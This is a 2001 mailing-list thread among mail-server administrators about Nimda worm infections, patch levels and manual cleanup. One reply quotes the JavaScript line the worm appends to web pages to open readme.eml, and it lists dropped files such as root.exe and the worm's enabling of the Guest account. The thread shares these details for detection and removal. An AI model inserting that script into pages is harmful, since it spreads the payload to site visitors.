The virus try to use backdoors left behind by code red. Maybe this was the
way it got in?
/Rasmus
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Stephen Price
Sent: 19. september 2001 15:33
To: [EMAIL PROTECTED]
Subject: Re: [imail] Nimda Virus
FYI,
Last week I made sure that two of my web servers had all the latest patches.
One is NT 4 and the other is W2K. They both were infected yesterday morning.
----- Original Message -----
From: "Webmaster Oilfield Directory" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, September 19, 2001 2:42 AM
Subject: RE: [imail] Nimda Virus
> This is the new security roll up package from microsoft at
> www.microsoft.com/ntserver/sp6asrp.asp for NT 4.0 check it out... it also
> says that any win2k system and i quote them "A new worm is affecting many
> customers. However, systems that are up to date on security patches are at
> little risk from it." Microsoft...
>
> Take it for what it's worth...
>
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Chad Heugel
> Sent: Tuesday, September 18, 2001 8:55 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [imail] Nimda Virus
>
>
> There was another update to NT4 they released, I believe it was July 26 or
> 27th of this year, that included all service releases since SP6a up until
> that date and should have included the original patch that should fix the
> vulnerability. It would essentially be Service pack 7 IMO, but was not
> released with that designation.
>
> On the servers where that was installed via windowsupdate on the NT4 boxes
> they so far have shown no signs of infection to this point. As have all
SP2
> Win2k machines. A few older NT4 boxes tho have shown these signs, and even
> after cleaning, not quite sure if they have been 'cleansed' because they
are
> still behaving strangely.
>
> I could be wrong, but this is only what I 'believe' to know as true. :)
>
> -Chh2
> ----- Original Message -----
> From: "Charles Frolick" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 10:18 PM
> Subject: RE: [imail] Nimda Virus
>
>
> > Tell me about it. I still have two nt4.0, sp6a bricks. About to try
> > reapplying sp6a, hope that works. Bummer is one of the boxes is my
> secured
> > site, and I don't have a backup of the key, and key manager says access
> > denied, along with a bunch of other really needed files. If it weren't
for
> > cmd.com and it's utils I'd wouldn't be able to do much of anything.
Would
> be
> > nice if I still had all the dos utils, got too used to doing it GUI (all
> the
> > floppies are probably past shelf life anyway).
> >
> > Chuck Frolick
> > ArgoNet, Inc.
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > David Rolling
> > Sent: Tuesday, September 18, 2001 8:38 PM
> > To: [EMAIL PROTECTED]
> > Subject: RE: [imail] Nimda Virus
> >
> >
> > great list but you forgot about me*.tmp.exe files these are the base
files
> > for the mep*.tmp.exe files and can be reload by the iexplorer .exe the
> > mmc.exe and winzip32.exe,MAPI32.DLL,MPR.DLL,system.ini files this is the
> > worst virus/worm I have eve seen since being online for 5+ years..
> >
> >
> > David Rolling
> > www.infovue.net
> > President
> > 877-722-2162
> > ========================================================
> > On the Plains of Hesitation, Bleach the Bones of Countless
> > Millions Who,
> > at the Dawn of Victory, Sat Down to Wait and Waiting Died
> > =========================================================
> >
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > Scot Desort
> > Sent: Tuesday, September 18, 2001 9:31 PM
> > To: [EMAIL PROTECTED]
> > Subject: Re: [imail] Nimda Virus
> >
> >
> > I have cleaned (I think) one Win2k server. Here are the steps I
followed:
> >
> > Here's some suggestions that I've used successfully (so far at least).
> > YMMV.
> >
> > Be sure and check your "Guest" user account. The worm will enable it
and
> > also put it in the local administrators group.
> >
> > To fix the web pages:
> > Open one of them in notepad or something and look at the last line of
the
> > file. You should see:
> > <html><script language="JavaScript">window.open("readme.eml", null,
> > "resizable=no,top=6000,left=6000")</script></html>
> >
> > I used Search & Replace from www.funduc.com to search for this string in
> all
> > *.htm, *.html, and *.asp files and remove it.
> >
> > Search for readme.eml, .eml, .nws, admin.dll, readme.exe, riched20.dll.
> > Delete them if the modified date on them is today. Also, mmc.exe. The
> good
> > one should be in \winnt\system32 and will be a larger file size. Note
> > admin.dll is a valid file for Front Page and will have a smaller file
size
> > and different date.
> >
> > Search for MEP*.TMP.EXE in the \temp directory and delete them.
> >
> > Look for root.exe in your web directories and remove it.
> >
> > Remove the drive shares on the root of your drives.
> >
> > Other files to look for are load.exe and a modified system.ini. I did
not
> > see these on NT.
> >
> > I also re-applied SP2 and rebooted.
> >
> > --
> > Scot
> >
> >
> > ----- Original Message -----
> > From: "Charles Frolick" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Tuesday, September 18, 2001 7:25 PM
> > Subject: RE: [imail] Nimda Virus
> >
> >
> > > Has anyone actually been able to completely remove the virus from
their
> > > system and return to normal? I have used several scanners, and
manually
> > did
> > > everything I can find documented and still I have two servers that
> > > essentially paper weights since I cannot connect them to the network,
> and
> > > they keep losing more and more functionality. (First lost use of
> > > Explorer.exe to serial crashing, now several programs are saying
access
> > > denied.)
> > >
> > > Chuck Frolick
> > > ArgoNet, Inc.
> > >
> > > -----Original Message-----
> > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > > Jasmine
> > > Sent: Tuesday, September 18, 2001 3:37 PM
> > > To: [EMAIL PROTECTED]
> > > Subject: [imail] Nimda Virus
> > >
> > >
> > > Has anyone found a separate virus removal tool that does not rely on
> anti-
> > > virus software yet?
> > >
> > > Thanks.
> > > J.
> > >
> > >
> > >
> > > ______________________________________________________________________
> > > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > > To Manage your Subscription......... http://humankindsystems.com/lists
> > >
> > >
> > >
> > >
> > >
> > > ______________________________________________________________________
> > > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > > To Manage your Subscription......... http://humankindsystems.com/lists
> > >
> >
> >
> >
> >
> > ______________________________________________________________________
> > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > To Manage your Subscription......... http://humankindsystems.com/lists
> >
> >
> >
> >
> > ______________________________________________________________________
> > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > To Manage your Subscription......... http://humankindsystems.com/lists
> >
> >
> >
> >
> >
> > ______________________________________________________________________
> > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > To Manage your Subscription......... http://humankindsystems.com/lists
> >
>
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists
>
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists
>
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
